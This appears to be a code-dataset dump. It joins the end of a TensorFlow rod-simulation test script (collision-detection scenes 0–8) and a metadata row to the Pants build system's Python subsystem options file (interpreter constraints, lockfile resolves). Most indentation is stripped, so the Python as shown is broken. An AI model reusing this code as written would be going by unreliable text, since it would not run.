saver = helper.RodSaver(path)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
nframe = 720
# nframe = 120
with progressbar.ProgressBar(max_value=nframe) as progress:
for frame in range(nframe):
if icond_updater is not None:
icond_updater(h, icond)
#inputdict = {irod.xs:xs, irod.restl:rl, irod.thetas:thetas, irod.xdots:xdots, irod:omegas:omegas}
inputdict = helper.create_dict([irod], [icond])
# inputdict.update({rrod.sela: sela_data, rrod.selb: selb_data})
# print(inputdict)
saver.add_timestep(
[icond.xs],
[icond.thetas],
[icond.refd1s],
[icond.refd2s])
# xs, xdots, thetas, omegas = sess.run([orod.xs, orod.xdots,
# orod.thetas, orod.omegas], feed_dict=inputdict)
# print(pfe.eval(feed_dict=inputdict))
# print(orod.XForce.eval(feed_dict=inputdict))
# print("xdots {}".format(xdots))
# print("thetas {}".format(icond.thetas))
icond = rrod.Relax(sess, irod, icond, ccd_h=h, ccd_broadthresh=icond.ccd_threshold)
# print('xs {}'.format(icond.xs))
# print("refd1s {}".format(icond.refd1s))
# print("refd2s {}".format(icond.refd2s))
progress.update(frame+1)
saver.close()
def run_test0():
'''
Test 0: 90-degree Crossing, homogeneous mass
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-0.5,0.5,-0.5],
[-0.5,0.5,0.5],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd0')
def run_test1():
'''
Test 0: 90-degree Crossing
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-0.5,0.5,-1],
[-0.5,0.5,1],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd1')
def run_test2():
'''
Test 2: 45-degree Crossing
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-0.5, 0.0,-0.5],
[-0.5, 1.0, 0.5],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd2')
def run_test3():
'''
Test 3: Multiple segments
'''
n = 3
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-2,0,0],
[-1,0,0],
[0,0,0],
[1,0,0],
])
rodb_xs = np.array([
[-2, 1,-1],
[-1, 1, 1],
[ 0, 1,-1],
[ 1, 1, 1],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd3')
def run_test4():
'''
Test 4: Multiple segments
'''
n = 10
h = 1.0/1024.0
rho = 1.0
roda_xs = helper.create_string(np.array([0,0.0,-2.25]), np.array([0,0.0,2.75]), n)
rodb_xs = helper.create_string(np.array([1,-2.25,0.0]), np.array([1,2.75,0.0]), n)
rods_xs = np.array([rodb_xs, roda_xs]) # B First
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
rods_xdots[0,:,0] = -10.0
print(rods_xdots)
initd1 = np.array([
[1,0,0],
[-1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.05
icond.beta = 0.05
# icond.constraint_tolerance = 1 # low-stiffness rods
# icond.anchor_stiffness = 1e3 # but we need maintain the anchor constrants
# icond.t = 0.0
run_with_bc(n, h, rho, icond, '/tmp/tfccd4')
def run_test5():
'''
Test 5: 0-degree Crossing
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-1,1.0,0],
[0, 1.0,0],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,-5,0],
[0,-5,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[0,1,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd5')
def run_test6():
'''
Test 6: Twisting strings
'''
n = 32
h = 1.0/1024.0
rho = 1.0
delta = (1.0/n)/2.0
roda_xs = helper.create_string(np.array([0,0,-2.5 + delta]), np.array([0,0,2.5 + delta]), n)
rodb_xs = helper.create_string(np.array([1,0.01,-2.5]), np.array([1,0.01,2.5]), n)
rods_xs = np.array([rodb_xs, roda_xs]) # B First
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[0,1,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.00125
icond.beta = 0.05
icond.constraint_tolerance = 5 # low-stiffness rods
icond.anchor_stiffness = 1e3 # but we need maintain the anchor constrants
icond.t = 0.0
icond.ccd_threshold = 0.05/h
def DualRotator(h, icond):
#icond.sparse_anchor_values[2, :] = np.array([math.cos(icond.t), math.sin(icond.t), 5.0], dtype=np.float32)
icond.sparse_anchor_values = np.array([
[math.cos(icond.t), math.sin(icond.t)+0.01, -2.5 + icond.t * 0.005],
[1, 0.01, 2.5],
# [math.cos(-icond.t), math.sin(-icond.t)+0.01, 2.5],
[0,0,-2.5 + delta],
[0,0,2.5 + delta],
], dtype=np.float32)
# print([math.cos(icond.t), math.sin(icond.t), 5.0])
# print(icond.sparse_anchor_values)
# print(icond.t)
#icond.sparse_anchor_values[3] = np.array([math.cos(-icond.t), math.sin(-icond.t), 0.0 + icond.t])
icond.t += h * 64
icond.sparse_anchor_indices = np.array([
[0, 0],
[0, n],
[1, 0],
[1, n],
], dtype=np.int32)
icond.sparse_anchor_values = np.array([
rods_xs[0,0,:],
rods_xs[0,-1,:],
rods_xs[1,0,:],
rods_xs[1,-1,:],
], dtype=np.float32)
# icond.g = 9.8
run_with_bc(n, h, rho, icond, '/tmp/tfccd6', icond_updater=DualRotator)
def run_test7():
'''
Test 7: Falling string
'''
n = 20
h = 1.0/1024.0
rho = 0.05
height = 2.0
delta = 0.2
roda_xs = helper.create_string(np.array([-5,0,0]), np.array([5,0,0]), n)
rodb_xs = helper.create_string(np.array([delta,-5+delta,height]), np.array([delta, 5+delta, height]), n)
rods_xs = np.array([roda_xs, rodb_xs])
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.5
icond.beta = 0.05
icond.t = 0.0
icond.ccd_threshold = 2.0 / h
icond.constraint_tolerance = 1e-5 * n * 2 # mid-stiffness rods
icond.anchor_stiffness = 1e3 # maintain the anchor constrants
icond.sparse_anchor_indices = np.array([
[0, 0],
[0, n],
], dtype=np.int32)
icond.sparse_anchor_values = np.array([
rods_xs[0,0,:],
rods_xs[0,-1,:],
], dtype=np.float32)
icond.g = 9.8
icond.rho = rho
run_with_bc(n, h, rho, icond, '/tmp/tfccd7')
def run_test8():
'''
Test 8: Falling segment
Failure case: delta = -0.6
'''
n = 1
h = 1.0/1024.0
rho = 1.0
height = 2.0
delta = 0.6 #-1.6
roda_xs = helper.create_string(np.array([-1+delta,0,0]), np.array([1 + delta,0,0]), n)
rodb_xs = helper.create_string(np.array([0,-1,height]), np.array([0,1,height]), n)
rods_xs = np.array([roda_xs, rodb_xs])
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.125
icond.beta = 0.05
icond.t = 0.0
icond.ccd_threshold = 200.0 / h
icond.sparse_anchor_indices = np.array([
[0, 0],
[0, n],
], dtype=np.int32)
icond.sparse_anchor_values = np.array([
rods_xs[0,0,:],
rods_xs[0,-1,:],
], dtype=np.float32)
icond.g = 9.8
run_with_bc(n, h, rho, icond, '/tmp/tfccd8')
def run():
run_test0()
run_test1()
run_test2()
run_test3()
run_test4()
run_test5()
run_test6()
run_test7()
run_test8()
if __name__ == '__main__':
run()
| [
"xinyazhang@utexas.edu"
] | xinyazhang@utexas.edu |
7c3cc5ad73fd374240d67326c992a1b4bc7e8aff | 5db0fab37c2b8a618d85d3b60fab9f806c416474 | /src/python/pants/backend/python/subsystems/setup.py | daee3e34c727448755ce462c7cbf1ebc5eaee574 | [
"Apache-2.0"
] | permissive | pantsbuild/pants | 4988d1ac5474ec95f94ce2218aeb759401e4b011 | 98cbda8545f0d58c586ed2daa76fefd729d5e0d5 | refs/heads/main | 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 | Apache-2.0 | 2023-09-14T19:33:33 | 2012-12-17T17:39:04 | Python | UTF-8 | Python | false | false | 28,266 | py | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import enum
import logging
import os
from typing import Iterable, List, Optional, TypeVar, cast
from packaging.utils import canonicalize_name
from pants.core.goals.generate_lockfiles import UnrecognizedResolveNamesError
from pants.option.errors import OptionsError
from pants.option.option_types import (
BoolOption,
DictOption,
EnumOption,
FileOption,
StrListOption,
StrOption,
)
from pants.option.subsystem import Subsystem
from pants.util.docutil import bin_name, doc_url
from pants.util.memo import memoized_method, memoized_property
from pants.util.strutil import softwrap
logger = logging.getLogger(__name__)
@enum.unique
class InvalidLockfileBehavior(enum.Enum):
    """How Pants reacts when a lockfile does not match the current build's
    requirements or interpreter constraints (see the
    `[python].invalid_lockfile_behavior` option below)."""

    error = "error"
    ignore = "ignore"
    warn = "warn"
@enum.unique
class LockfileGenerator(enum.Enum):
    """Tool used to generate lockfiles."""

    PEX = "pex"
    POETRY = "poetry"
RESOLVE_OPTION_KEY__DEFAULT = "__default__"
_T = TypeVar("_T")
class PythonSetup(Subsystem):
options_scope = "python"
help = "Options for Pants's Python backend."
default_interpreter_universe = [
"2.7",
"3.5",
"3.6",
"3.7",
"3.8",
"3.9",
"3.10",
"3.11",
"3.12",
]
_interpreter_constraints = StrListOption(
default=None,
help=softwrap(
"""
The Python interpreters your codebase is compatible with.
These constraints are used as the default value for the `interpreter_constraints`
field of Python targets.
Specify with requirement syntax, e.g. `'CPython>=2.7,<3'` (A CPython interpreter with
version >=2.7 AND version <3) or `'PyPy'` (A pypy interpreter of any version). Multiple
constraint strings will be ORed together.
"""
),
advanced=True,
metavar="<requirement>",
)
@memoized_property
def interpreter_constraints(self) -> tuple[str, ...]:
    """Return the default interpreter constraints, requiring them to be set.

    Raises OptionsError when `[python].interpreter_constraints` was not
    explicitly configured (except under Pants's own test runs — see below).
    """
    if not self._interpreter_constraints:
        # TODO: This is a hacky affordance for Pants's own tests, dozens of which were
        # written when Pants provided default ICs, and implicitly rely on that assumption.
        # We'll probably want to find and modify all those tests to set an explicit IC, but
        # that will take time.
        if "PYTEST_CURRENT_TEST" in os.environ:
            return (">=3.7,<4",)
        raise OptionsError(
            softwrap(
                f"""\
                You must explicitly specify the default Python interpreter versions your code
                is intended to run against.

                You specify these interpreter constraints using the `interpreter_constraints`
                option in the `[python]` section of pants.toml.

                We recommend constraining to a single interpreter minor version if you can,
                e.g., `interpreter_constraints = ['==3.11.*']`, or at least a small number of
                interpreter minor versions, e.g., `interpreter_constraints = ['>=3.10,<3.12']`.

                Individual targets can override these default interpreter constraints,
                if different parts of your codebase run against different python interpreter
                versions in a single repo.

                See {doc_url("python-interpreter-compatibility")} for details.
                """
            ),
        )
    return self._interpreter_constraints
interpreter_versions_universe = StrListOption(
default=default_interpreter_universe,
help=softwrap(
f"""
All known Python major/minor interpreter versions that may be used by either
your code or tools used by your code.
This is used by Pants to robustly handle interpreter constraints, such as knowing
when generating lockfiles which Python versions to check if your code is using.
This does not control which interpreter your code will use. Instead, to set your
interpreter constraints, update `[python].interpreter_constraints`, the
`interpreter_constraints` field, and relevant tool options like
`[isort].interpreter_constraints` to tell Pants which interpreters your code
actually uses. See {doc_url('python-interpreter-compatibility')}.
All elements must be the minor and major Python version, e.g. `'2.7'` or `'3.10'`. Do
not include the patch version.
"""
),
advanced=True,
)
enable_resolves = BoolOption(
default=False,
help=softwrap(
"""
Set to true to enable lockfiles for user code. See `[python].resolves` for an
explanation of this feature.
This option is mutually exclusive with `[python].requirement_constraints`. We strongly
recommend using this option because it:
1. Uses `--hash` to validate that all downloaded files are expected, which reduces\
the risk of supply chain attacks.
2. Enforces that all transitive dependencies are in the lockfile, whereas\
constraints allow you to leave off dependencies. This ensures your build is more\
stable and reduces the risk of supply chain attacks.
3. Allows you to have multiple lockfiles in your repository.
"""
),
advanced=True,
mutually_exclusive_group="lockfile",
)
resolves = DictOption[str](
default={"python-default": "3rdparty/python/default.lock"},
help=softwrap(
f"""
A mapping of logical names to lockfile paths used in your project.
Many organizations only need a single resolve for their whole project, which is
a good default and often the simplest thing to do. However, you may need multiple
resolves, such as if you use two conflicting versions of a requirement in
your repository.
If you only need a single resolve, run `{bin_name()} generate-lockfiles` to
generate the lockfile.
If you need multiple resolves:
1. Via this option, define multiple resolve names and their lockfile paths.\
The names should be meaningful to your repository, such as `data-science` or\
`pants-plugins`.
2. Set the default with `[python].default_resolve`.
3. Update your `python_requirement` targets with the `resolve` field to declare which\
resolve they should be available in. They default to `[python].default_resolve`,\
so you only need to update targets that you want in non-default resolves.\
(Often you'll set this via the `python_requirements` or `poetry_requirements`\
target generators)
4. Run `{bin_name()} generate-lockfiles` to generate the lockfiles. If the results\
aren't what you'd expect, adjust the prior step.
5. Update any targets like `python_source` / `python_sources`,\
`python_test` / `python_tests`, and `pex_binary` which need to set a non-default\
resolve with the `resolve` field.
If a target can work with multiple resolves, you can either use the `parametrize`
mechanism or manually create a distinct target per resolve. See {doc_url("targets")}
for information about `parametrize`.
For example:
python_sources(
resolve=parametrize("data-science", "web-app"),
)
You can name the lockfile paths what you would like; Pants does not expect a
certain file extension or location.
Only applies if `[python].enable_resolves` is true.
"""
),
advanced=True,
)
default_resolve = StrOption(
default="python-default",
help=softwrap(
"""
The default value used for the `resolve` field.
The name must be defined as a resolve in `[python].resolves`.
"""
),
advanced=True,
)
default_run_goal_use_sandbox = BoolOption(
default=True,
help=softwrap(
"""
The default value used for the `run_goal_use_sandbox` field of Python targets. See the
relevant field for more details.
"""
),
)
pip_version = StrOption(
default="23.1.2",
help=softwrap(
f"""
Use this version of Pip for resolving requirements and generating lockfiles.
The value used here must be one of the Pip versions supported by the underlying PEX
version. See {doc_url("pex")} for details.
N.B.: The `latest` value selects the latest of the choices listed by PEX which is not
necessarily the latest Pip version released on PyPI.
"""
),
advanced=True,
)
_resolves_to_interpreter_constraints = DictOption["list[str]"](
help=softwrap(
"""
Override the interpreter constraints to use when generating a resolve's lockfile
with the `generate-lockfiles` goal.
By default, each resolve from `[python].resolves` will use your
global interpreter constraints set in `[python].interpreter_constraints`. With
this option, you can override each resolve to use certain interpreter
constraints, such as `{'data-science': ['==3.8.*']}`.
Warning: this does NOT impact the interpreter constraints used by targets within the
resolve, which is instead set by the option `[python].interpreter_constraints` and the
`interpreter_constraints` field. It only impacts how the lockfile is generated.
Pants will validate that the interpreter constraints of your code using a
resolve are compatible with that resolve's own constraints. For example, if your
code is set to use `['==3.9.*']` via the `interpreter_constraints` field, but it's
using a resolve whose interpreter constraints are set to `['==3.7.*']`, then
Pants will error explaining the incompatibility.
The keys must be defined as resolves in `[python].resolves`.
"""
),
advanced=True,
)
_resolves_to_constraints_file = DictOption[str](
help=softwrap(
f"""
When generating a resolve's lockfile, use a constraints file to pin the version of
certain requirements. This is particularly useful to pin the versions of transitive
dependencies of your direct requirements.
See https://pip.pypa.io/en/stable/user_guide/#constraints-files for more information on
the format of constraint files and how constraints are applied in Pex and pip.
Expects a dictionary of resolve names from `[python].resolves` and Python tools (e.g.
`black` and `pytest`) to file paths for
constraints files. For example,
`{{'data-science': '3rdparty/data-science-constraints.txt'}}`.
If a resolve is not set in the dictionary, it will not use a constraints file.
You can use the key `{RESOLVE_OPTION_KEY__DEFAULT}` to set a default value for all
resolves.
"""
),
advanced=True,
)
_resolves_to_no_binary = DictOption[List[str]](
help=softwrap(
f"""
When generating a resolve's lockfile, do not use binary packages (i.e. wheels) for
these 3rdparty project names.
Expects a dictionary of resolve names from `[python].resolves` and Python tools (e.g.
`black` and `pytest`) to lists of project names. For example,
`{{'data-science': ['requests', 'numpy']}}`. If a resolve is not set in the dictionary,
it will have no restrictions on binary packages.
You can use the key `{RESOLVE_OPTION_KEY__DEFAULT}` to set a default value for all
resolves.
For each resolve, you can also use the value `:all:` to disable all binary packages:
`{{'data-science': [':all:']}}`.
Note that some packages are tricky to compile and may fail to install when this option
is used on them. See https://pip.pypa.io/en/stable/cli/pip_install/#install-no-binary
for details.
"""
),
advanced=True,
)
_resolves_to_only_binary = DictOption[List[str]](
help=softwrap(
f"""
When generating a resolve's lockfile, do not use source packages (i.e. sdists) for
these 3rdparty project names, e.g `['django', 'requests']`.
Expects a dictionary of resolve names from `[python].resolves` and Python tools (e.g.
`black` and `pytest`) to lists of project names. For example,
`{{'data-science': ['requests', 'numpy']}}`. If a resolve is not set in the dictionary,
it will have no restrictions on source packages.
You can use the key `{RESOLVE_OPTION_KEY__DEFAULT}` to set a default value for all
resolves.
For each resolve you can use the value `:all:` to disable all source packages:
`{{'data-science': [':all:']}}`.
Packages without binary distributions will fail to install when this option is used on
them. See https://pip.pypa.io/en/stable/cli/pip_install/#install-only-binary for
details.
"""
),
advanced=True,
)
invalid_lockfile_behavior = EnumOption(
default=InvalidLockfileBehavior.error,
help=softwrap(
"""
The behavior when a lockfile has requirements or interpreter constraints that are
not compatible with what the current build is using.
We recommend keeping the default of `error` for CI builds.
Note that `warn` will still expect a Pants lockfile header, it only won't error if
the lockfile is stale and should be regenerated.
Use `ignore` to avoid needing a lockfile header at all, e.g. if you are manually
managing lockfiles rather than using the `generate-lockfiles` goal.
"""
),
advanced=True,
)
resolves_generate_lockfiles = BoolOption(
default=True,
help=softwrap(
"""
If False, Pants will not attempt to generate lockfiles for `[python].resolves` when
running the `generate-lockfiles` goal.
This is intended to allow you to manually generate lockfiles for your own code,
rather than using Pex lockfiles. For example, when adopting Pants in a project already
using Poetry, you can use `poetry export --dev` to create a requirements.txt-style
lockfile understood by Pants, then point `[python].resolves` to the file.
If you set this to False, Pants will not attempt to validate the metadata headers
for your user lockfiles. This is useful so that you can keep
`[python].invalid_lockfile_behavior` to `error` or `warn` if you'd like so that tool
lockfiles continue to be validated, while user lockfiles are skipped.
Warning: it will likely be slower to install manually generated user lockfiles than Pex
ones because Pants cannot as efficiently extract the subset of requirements used for a
particular task. See the option `[python].run_against_entire_lockfile`.
"""
),
advanced=True,
)
run_against_entire_lockfile = BoolOption(
default=False,
help=softwrap(
"""
If enabled, when running binaries, tests, and repls, Pants will use the entire
lockfile file instead of just the relevant subset.
If you are using Pex lockfiles, we generally do not recommend this. You will already
get similar performance benefits to this option, without the downsides.
Otherwise, this option can improve performance and reduce cache size.
But it has two consequences:
1) All cached test results will be invalidated if any requirement in the lockfile
changes, rather than just those that depend on the changed requirement.
2) Requirements unneeded by a test/run/repl will be present on the sys.path, which
might in rare cases cause their behavior to change.
This option does not affect packaging deployable artifacts, such as
PEX files, wheels and cloud functions, which will still use just the exact
subset of requirements needed.
"""
),
advanced=True,
)
__constraints_deprecation_msg = softwrap(
f"""
We encourage instead migrating to `[python].enable_resolves` and `[python].resolves`,
which is an improvement over this option. The `[python].resolves` feature ensures that
your lockfiles are fully comprehensive, i.e. include all transitive dependencies;
uses hashes for better supply chain security; and supports advanced features like VCS
and local requirements, along with options `[python].resolves_to_only_binary`.
To migrate, stop setting `[python].requirement_constraints` and
`[python].resolve_all_constraints`, and instead set `[python].enable_resolves` to
`true`. Then, run `{bin_name()} generate-lockfiles`.
"""
)
requirement_constraints = FileOption(
default=None,
help=softwrap(
"""
When resolving third-party requirements for your own code (vs. tools you run),
use this constraints file to determine which versions to use.
Mutually exclusive with `[python].enable_resolves`, which we generally recommend as an
improvement over constraints file.
See https://pip.pypa.io/en/stable/user_guide/#constraints-files for more
information on the format of constraint files and how constraints are applied in
Pex and pip.
This only applies when resolving user requirements, rather than tools you run
like Black and Pytest. To constrain tools, set `[tool].lockfile`, e.g.
`[black].lockfile`.
"""
),
advanced=True,
mutually_exclusive_group="lockfile",
removal_version="3.0.0.dev0",
removal_hint=__constraints_deprecation_msg,
)
_resolve_all_constraints = BoolOption(
default=True,
help=softwrap(
"""
(Only relevant when using `[python].requirement_constraints.`) If enabled, when
resolving requirements, Pants will first resolve your entire
constraints file as a single global resolve. Then, if the code uses a subset of
your constraints file, Pants will extract the relevant requirements from that
global resolve so that only what's actually needed gets used. If disabled, Pants
will not use a global resolve and will resolve each subset of your requirements
independently.
Usually this option should be enabled because it can result in far fewer resolves.
"""
),
advanced=True,
removal_version="3.0.0.dev0",
removal_hint=__constraints_deprecation_msg,
)
resolver_manylinux = StrOption(
default="manylinux2014",
help=softwrap(
"""
Whether to allow resolution of manylinux wheels when resolving requirements for
foreign linux platforms. The value should be a manylinux platform upper bound,
e.g. `'manylinux2010'`, or else the string `'no'` to disallow.
"""
),
advanced=True,
)
tailor_source_targets = BoolOption(
default=True,
help=softwrap(
"""
If true, add `python_sources`, `python_tests`, and `python_test_utils` targets with
the `tailor` goal."""
),
advanced=True,
)
tailor_ignore_empty_init_files = BoolOption(
"--tailor-ignore-empty-init-files",
default=True,
help=softwrap(
"""
If true, don't add `python_sources` targets for `__init__.py` files that are both empty
and where there are no other Python files in the directory.
Empty and solitary `__init__.py` files usually exist as import scaffolding rather than
true library code, so it can be noisy to add BUILD files.
Even if this option is set to true, Pants will still ensure the empty `__init__.py`
files are included in the sandbox when running processes.
If you set to false, you may also want to set `[python-infer].init_files = "always"`.
"""
),
advanced=True,
)
tailor_requirements_targets = BoolOption(
default=True,
help=softwrap(
"""
If true, add `python_requirements`, `poetry_requirements`, and `pipenv_requirements`
target generators with the `tailor` goal.
`python_requirements` targets are added for any file that matches the pattern
`*requirements*.txt`. You will need to manually add `python_requirements` for different
file names like `reqs.txt`.
`poetry_requirements` targets are added for `pyproject.toml` files with `[tool.poetry`
in them.
"""
),
advanced=True,
)
tailor_pex_binary_targets = BoolOption(
default=False,
help=softwrap(
"""
If true, add `pex_binary` targets for Python files named `__main__.py` or with a
`__main__` clause with the `tailor` goal.
"""
),
advanced=True,
)
tailor_py_typed_targets = BoolOption(
default=True,
help=softwrap(
"""
If true, add `resource` targets for marker files named `py.typed` with the `tailor` goal.
"""
),
advanced=True,
)
macos_big_sur_compatibility = BoolOption(
default=False,
help=softwrap(
"""
If set, and if running on macOS Big Sur, use `macosx_10_16` as the platform
when building wheels. Otherwise, the default of `macosx_11_0` will be used.
This may be required for `pip` to be able to install the resulting distribution
on Big Sur.
"""
),
advanced=True,
)
enable_lockfile_targets = BoolOption(
default=True,
help=softwrap(
"""
Create targets for all Python lockfiles defined in `[python].resolves`.
The lockfile targets will then be used as dependencies to the `python_requirement`
targets that use them, invalidating source targets per resolve when the lockfile
changes.
If another targets address is in conflict with the created lockfile target, it will
shadow the lockfile target and it will not be available as a dependency for any
`python_requirement` targets.
"""
),
advanced=True,
)
repl_history = BoolOption(
default=True,
help="Whether to use the standard Python command history file when running a repl.",
)
@property
def enable_synthetic_lockfiles(self) -> bool:
return self.enable_resolves and self.enable_lockfile_targets
@memoized_property
def resolves_to_interpreter_constraints(self) -> dict[str, tuple[str, ...]]:
result = {}
unrecognized_resolves = []
for resolve, ics in self._resolves_to_interpreter_constraints.items():
if resolve not in self.resolves:
unrecognized_resolves.append(resolve)
result[resolve] = tuple(ics)
if unrecognized_resolves:
raise UnrecognizedResolveNamesError(
unrecognized_resolves,
self.resolves.keys(),
description_of_origin="the option `[python].resolves_to_interpreter_constraints`",
)
return result
def _resolves_to_option_helper(
self,
option_value: dict[str, _T],
option_name: str,
) -> dict[str, _T]:
all_valid_resolves = set(self.resolves)
unrecognized_resolves = set(option_value.keys()) - {
RESOLVE_OPTION_KEY__DEFAULT,
*all_valid_resolves,
}
if unrecognized_resolves:
raise UnrecognizedResolveNamesError(
sorted(unrecognized_resolves),
{*all_valid_resolves, RESOLVE_OPTION_KEY__DEFAULT},
description_of_origin=f"the option `[python].{option_name}`",
)
default_val = option_value.get(RESOLVE_OPTION_KEY__DEFAULT)
if not default_val:
return option_value
return {resolve: option_value.get(resolve, default_val) for resolve in all_valid_resolves}
@memoized_method
def resolves_to_constraints_file(self) -> dict[str, str]:
return self._resolves_to_option_helper(
self._resolves_to_constraints_file,
"resolves_to_constraints_file",
)
@memoized_method
def resolves_to_no_binary(self) -> dict[str, list[str]]:
return {
resolve: [canonicalize_name(v) for v in vals]
for resolve, vals in self._resolves_to_option_helper(
self._resolves_to_no_binary,
"resolves_to_no_binary",
).items()
}
@memoized_method
def resolves_to_only_binary(self) -> dict[str, list[str]]:
return {
resolve: sorted([canonicalize_name(v) for v in vals])
for resolve, vals in self._resolves_to_option_helper(
self._resolves_to_only_binary,
"resolves_to_only_binary",
).items()
}
@property
def manylinux(self) -> str | None:
manylinux = cast(Optional[str], self.resolver_manylinux)
if manylinux is None or manylinux.lower() in ("false", "no", "none"):
return None
return manylinux
@property
def resolve_all_constraints(self) -> bool:
if (
self._resolve_all_constraints
and not self.options.is_default("resolve_all_constraints")
and not self.requirement_constraints
):
raise ValueError(
softwrap(
"""
`[python].resolve_all_constraints` is enabled, so
`[python].requirement_constraints` must also be set.
"""
)
)
return self._resolve_all_constraints
@property
def scratch_dir(self):
return os.path.join(self.options.pants_workdir, *self.options_scope.split("."))
